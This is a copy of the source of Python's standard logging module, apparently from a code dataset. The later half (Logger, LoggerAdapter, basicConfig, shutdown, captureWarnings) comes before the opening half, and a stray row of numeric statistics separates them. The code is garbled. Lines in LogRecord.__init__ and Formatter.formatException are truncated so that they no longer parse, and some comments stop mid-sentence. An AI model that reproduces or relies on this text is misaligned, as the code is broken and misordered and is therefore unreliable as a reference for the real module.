fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if isinstance(exc_info, BaseException):
exc_info = (type(exc_info), exc_info, exc_info.__traceback__)
elif not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.disabled:
return False
try:
return self._cache[level]
except KeyError:
_acquireLock()
try:
if self.manager.disable >= level:
is_enabled = self._cache[level] = False
else:
is_enabled = self._cache[level] = (
level >= self.getEffectiveLevel()
)
finally:
_releaseLock()
return is_enabled
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
def __repr__(self):
level = getLevelName(self.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, self.name, level)
def __reduce__(self):
# In general, only the root logger will not be accessible via its name.
# However, the root logger's class has its own __reduce__ method.
if getLogger(self.name) is not self:
import pickle
raise pickle.PicklingError('logger cannot be pickled')
return getLogger, (self.name,)
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
def __reduce__(self):
return getLogger, ()
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra=None):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
self.log(ERROR, msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
return self.logger.isEnabledFor(level)
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level log implementation, proxied to allow nested logger adapters.
"""
return self.logger._log(
level,
msg,
args,
exc_info=exc_info,
extra=extra,
stack_info=stack_info,
)
@property
def manager(self):
return self.logger.manager
@manager.setter
def manager(self, value):
self.logger.manager = value
@property
def name(self):
return self.logger.name
def __repr__(self):
logger = self.logger
level = getLevelName(logger.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, logger.name, level)
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured, unless the keyword argument *force* is set to ``True``.
It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
force If this keyword is specified as true, any existing handlers
attached to the root logger are removed and closed, before
carrying out the configuration as specified by the other
arguments.
encoding If specified together with a filename, this encoding is passed to
the created FileHandler, causing it to be used when the file is
opened.
errors If specified together with a filename, this value is passed to the
created FileHandler, causing it to be used when the file is
opened in text mode. If not specified, the default value is
`backslashreplace`.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
``stream``.
.. versionchanged:: 3.8
Added the ``force`` parameter.
.. versionchanged:: 3.9
Added the ``encoding`` and ``errors`` parameters.
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
force = kwargs.pop('force', False)
encoding = kwargs.pop('encoding', None)
errors = kwargs.pop('errors', 'backslashreplace')
if force:
for h in root.handlers[:]:
root.removeHandler(h)
h.close()
if len(root.handlers) == 0:
handlers = kwargs.pop("handlers", None)
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.pop("filename", None)
mode = kwargs.pop("filemode", 'a')
if filename:
if 'b'in mode:
errors = None
h = FileHandler(filename, mode,
encoding=encoding, errors=errors)
else:
stream = kwargs.pop("stream", None)
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.pop("datefmt", None)
style = kwargs.pop("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.pop("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.pop("level", None)
if level is not None:
root.setLevel(level)
if kwargs:
keys = ', '.join(kwargs.keys())
raise ValueError('Unrecognised argument(s): %s' % keys)
finally:
_releaseLock()
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if not name or isinstance(name, str) and name == root.name:
return root
return Logger.manager.getLogger(name)
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
def fatal(msg, *args, **kwargs):
"""
Don't use this function, use critical() instead.
"""
critical(msg, *args, **kwargs)
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, exc_info=True, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
error(msg, *args, exc_info=exc_info, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level=CRITICAL):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
root.manager._clear_cache()
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
def _at_fork_reinit(self):
pass
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarnings which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
| 35.433469
| 106
| 0.588637
|
import sys, os, time, io, re, traceback, warnings, weakref, collections.abc
from string import Template
from string import Formatter as StrFormatter
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'shutdown',
'warn', 'warning', 'getLogRecordFactory', 'setLogRecordFactory',
'lastResort', 'raiseExceptions']
import threading
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
_startTime = time.time()
raiseExceptions = True
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
logMultiprocessing = True
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'FATAL': FATAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
# See Issues #22386, #27937 and #29220 for why it's this way
result = _levelToName.get(level)
if result is not None:
return result
result = _nameToLevel.get(level)
if result is not None:
return result
return "Level %s" % level
def addLevelName(level, levelName):
_acquireLock()
try:
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else:
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
_lock = threading.RLock()
def _acquireLock():
if _lock:
_lock.acquire()
def _releaseLock():
if _lock:
_lock.release()
if not hasattr(os, 'register_at_fork'):
def _register_at_fork_reinit_lock(instance):
pass
else:
_at_fork_reinit_lock_weakset = weakref.WeakSet()
def _register_at_fork_reinit_lock(instance):
_acquireLock()
try:
_at_fork_reinit_lock_weakset.add(instance)
finally:
_releaseLock()
def _after_at_fork_child_reinit_locks():
for handler in _at_fork_reinit_lock_weakset:
handler._at_fork_reinit()
_lock._at_fork_reinit()
os.register_at_fork(before=_acquireLock,
after_in_child=_after_at_fork_child_reinit_locks,
after_in_parent=_releaseLock)
class LogRecord(object):
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
ct = time.time()
self.name = name
self.msg = msg
d len(args) == 1 and isinstance(args[0], collections.abc.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else:
self.thread = None
self.threadName = None
if not logMultiprocessing:
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
try:
self.processName = mp.current_process().name
except Exception:
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __repr__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
return _logRecordFactory
def makeLogRecord(dict):
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
_str_formatter = StrFormatter()
del StrFormatter
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
validation_pattern = re.compile(r'%\(\w+\)[#0+ -]*(\*|\d+)?(\.(\*|\d+))?[diouxefgcrsa%]', re.I)
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def validate(self):
if not self.validation_pattern.search(self._fmt):
raise ValueError("Invalid format '%s' for '%s' style" % (self._fmt, self.default_format[0]))
def _format(self, record):
return self._fmt % record.__dict__
def format(self, record):
try:
return self._format(record)
except KeyError as e:
raise ValueError('Formatting field not found in record: %s' % e)
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
fmt_spec = re.compile(r'^(.?[<>=^])?[+ -]?#?0?(\d+|{\w+})?[,_]?(\.(\d+|{\w+}))?[bcdefgnosx%]?$', re.I)
field_spec = re.compile(r'^(\d+|\w+)(\.\w+|\[[^]]+\])*$')
def _format(self, record):
return self._fmt.format(**record.__dict__)
def validate(self):
fields = set()
try:
for _, fieldname, spec, conversion in _str_formatter.parse(self._fmt):
if fieldname:
if not self.field_spec.match(fieldname):
raise ValueError('invalid field name/expression: %r' % fieldname)
fields.add(fieldname)
if conversion and conversion not in 'rsa':
raise ValueError('invalid conversion: %r' % conversion)
if spec and not self.fmt_spec.match(spec):
raise ValueError('bad specifier: %r' % spec)
except ValueError as e:
raise ValueError('invalid format: %s' % e)
if not fields:
raise ValueError('invalid format: no fields')
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def validate(self):
pattern = Template.pattern
fields = set()
for m in pattern.finditer(self._fmt):
d = m.groupdict()
if d['named']:
fields.add(d['named'])
elif d['braced']:
fields.add(d['braced'])
elif m.group(0) == '$':
raise ValueError('invalid format: bare \'$\' not allowed')
if not fields:
raise ValueError('invalid format: no fields')
def _format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
class Formatter(object):
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%', validate=True):
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
if validate:
self._style.validate()
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
s = time.strftime(self.default_time_format, ct)
if self.default_msec_format:
s = self.default_msec_format % (s, record.msecs)
return s
def formatException(self, ei):
sio = io.StringIO()
tb = ei[2]
None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
return stack_info
def format(self, record):
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
def __init__(self, linefmt=None):
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
return ""
def formatFooter(self, records):
return ""
def format(self, records):
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
def __init__(self, name=''):
self.name = name
self.nlen = len(name)
def filter(self, record):
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
class Filterer(object):
def __init__(self):
self.filters = []
def addFilter(self, filter):
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
def __init__(self, level=NOTSET):
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
self.lock = threading.RLock()
_register_at_fork_reinit_lock(self)
def _at_fork_reinit(self):
self.lock._at_fork_reinit()
def acquire(self):
if self.lock:
self.lock.acquire()
def release(self):
if self.lock:
self.lock.release()
def setLevel(self, level):
self.level = _checkLevel(level)
def format(self, record):
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
self.formatter = fmt
def flush(self):
pass
def close(self):
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except RecursionError: # See issue 36272
raise
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
def __repr__(self):
level = getLevelName(self.level)
return '<%s (%s)>' % (self.__class__.__name__, level)
class StreamHandler(Handler):
terminator = '\n'
def __init__(self, stream=None):
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
try:
msg = self.format(record)
stream = self.stream
# issue 35046: merged two stream.writes into one.
stream.write(msg + self.terminator)
self.flush()
except RecursionError: # See issue 36272
raise
except Exception:
self.handleError(record)
def setStream(self, stream):
if stream is self.stream:
result = None
else:
result = self.stream
self.acquire()
try:
self.flush()
self.stream = stream
finally:
self.release()
return result
def __repr__(self):
level = getLevelName(self.level)
name = getattr(self.stream, 'name', '')
# bpo-36015: name can be an int
name = str(name)
if name:
name += ' '
return '<%s %s(%s)>' % (self.__class__.__name__, name, level)
class FileHandler(StreamHandler):
def __init__(self, filename, mode='a', encoding=None, delay=False, errors=None):
# Issue #27493: add support for Path objects to be passed in
filename = os.fspath(filename)
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.errors = errors
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
self.acquire()
try:
try:
if self.stream:
try:
self.flush()
finally:
stream = self.stream
self.stream = None
if hasattr(stream, "close"):
stream.close()
finally:
StreamHandler.close(self)
finally:
self.release()
def _open(self):
return open(self.baseFilename, self.mode, encoding=self.encoding,
errors=self.errors)
def emit(self, record):
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
def __repr__(self):
level = getLevelName(self.level)
return '<%s %s (%s)>' % (self.__class__.__name__, self.baseFilename, level)
class _StderrHandler(StreamHandler):
def __init__(self, level=NOTSET):
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
class PlaceHolder(object):
def __init__(self, alogger):
self.loggerMap = { alogger : None }
def append(self, alogger):
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
def setLoggerClass(klass):
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
return _loggerClass
class Manager(object):
def __init__(self, rootnode):
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
